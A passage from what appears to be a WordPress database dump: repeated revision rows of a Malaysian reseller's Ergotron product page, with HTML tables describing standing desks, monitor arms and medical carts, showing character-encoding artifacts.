Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â LX Dual Stacking Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          Create a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â LX Wall Monitor Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n        </td>\r\n        <td>\r\n          Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h2>Product Benefits</h2>\r\n  <ul>\r\n   	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n   	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n   	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n   	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n   	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n  </ul>\r\n\r\n  &nbsp;\r\n  <h1>Mobile Carts</h1>\r\n  Personalize an AV, computer or laptop cart to suit your workflow requirements.\r\n\r\n  &nbsp;\r\n  <h2>1. Mobile Workstations</h2>\r\n\r\n  &nbsp;\r\n  <h3>1. WorkFit-C, Single LD Sit-Stand Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â WorkFit-C, Dual Sit-Stand Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          This innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â Neo-FlexÂ® Laptop Cart</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h1>Medical Carts</h1>\r\n\r\n  &nbsp;\r\n  <h3>1.Â StyleViewÂ® Laptop Cart, SV40</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Incredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, Powered</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Expand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â StyleViewÂ® Telemedicine Cart, Powered</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          The modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          The ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  To discover more, please click the button below or contact us to discuss your needs.\r\n\r\n','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 16:41:31','2019-09-26 08:41:31','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3538,1,'2019-09-26 16:43:21','2019-09-26 08:43:21','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n  <h1>Standing Desks</h1>\r\n  Sit less. Stand more. Feel the difference.\r\n\r\n\r\n  <h3>1. WorkFit-Z Mini</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â WorkFit-TL, Standing Desk Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n        <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n        <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h1>Mounts</h1>\r\n  Improve your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n\r\n  <h3>1. LX Desk Monitor Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â LX Dual Stacking Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          Create a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â LX Wall Monitor Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n        </td>\r\n        <td>\r\n          Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h2>Product Benefits</h2>\r\n  <ul>\r\n   	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n   	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n   	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n   	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n   	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n  </ul>\r\n\r\n  &nbsp;\r\n  <h1>Mobile Carts</h1>\r\n  Personalize an AV, computer or laptop cart to suit your workflow requirements.\r\n\r\n  &nbsp;\r\n  <h2>1. Mobile Workstations</h2>\r\n\r\n  &nbsp;\r\n  <h3>1. WorkFit-C, Single LD Sit-Stand Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â WorkFit-C, Dual Sit-Stand Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          This innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â Neo-FlexÂ® Laptop Cart</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h1>Medical Carts</h1>\r\n\r\n  &nbsp;\r\n  <h3>1.Â StyleViewÂ® Laptop Cart, SV40</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Incredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, Powered</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Expand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â StyleViewÂ® Telemedicine Cart, Powered</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          The modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          The ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  To discover more, please click the button below or contact us to discuss your needs.\r\n\r\n<center>[maxbutton id=\"1\" ]</center>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 16:43:21','2019-09-26 08:43:21','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3539,1,'2019-09-26 16:43:58','2019-09-26 08:43:58','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n<h4>1. Ergonomics</h4>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n<h4>2. Environment</h4>\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n<h4>3. Research</h4>\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n<h4>4. Quality Tested</h4>\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n&nbsp;\r\n  <h1>Standing Desks</h1>\r\n  Sit less. Stand more. Feel the difference.\r\n\r\n\r\n  <h3>1. WorkFit-Z Mini</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"wp-image-2486 alignleft\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Make your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â WorkFit-TL, Standing Desk Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n        <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Presenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â WorkFit-S,Â Dual Workstation with Worksurface</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n        <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h1>Mounts</h1>\r\n  Improve your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n\r\n  <h3>1. LX Desk Monitor Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â LX Dual Stacking Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          Create a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â LX Wall Monitor Arm</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n        </td>\r\n        <td>\r\n          Sleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h2>Product Benefits</h2>\r\n  <ul>\r\n   	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n   	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n   	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n   	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n   	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n  </ul>\r\n\r\n  &nbsp;\r\n  <h1>Mobile Carts</h1>\r\n  Personalize an AV, computer or laptop cart to suit your workflow requirements.\r\n\r\n  &nbsp;\r\n  <h2>1. Mobile Workstations</h2>\r\n\r\n  &nbsp;\r\n  <h3>1. WorkFit-C, Single LD Sit-Stand Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â WorkFit-C, Dual Sit-Stand Workstation</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          This innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>3.Â Neo-FlexÂ® Laptop Cart</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" />\r\n        </td>\r\n        <td>\r\n          This secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h1>Medical Carts</h1>\r\n\r\n  &nbsp;\r\n  <h3>1.Â StyleViewÂ® Laptop Cart, SV40</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\"/>\r\n        </td>\r\n        <td>\r\n          Incredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n        </td>\r\n      </tr>\r\n    </tbody>\r\n  </table>\r\n\r\n  &nbsp;\r\n  <h3>2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, Powered</h3>\r\n  <table width=\"100%\" border=\"1\">\r\n    <tbody>\r\n      <tr height=\"280px\">\r\n        <td width=\"25%\" align=\"center\">\r\n          <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" 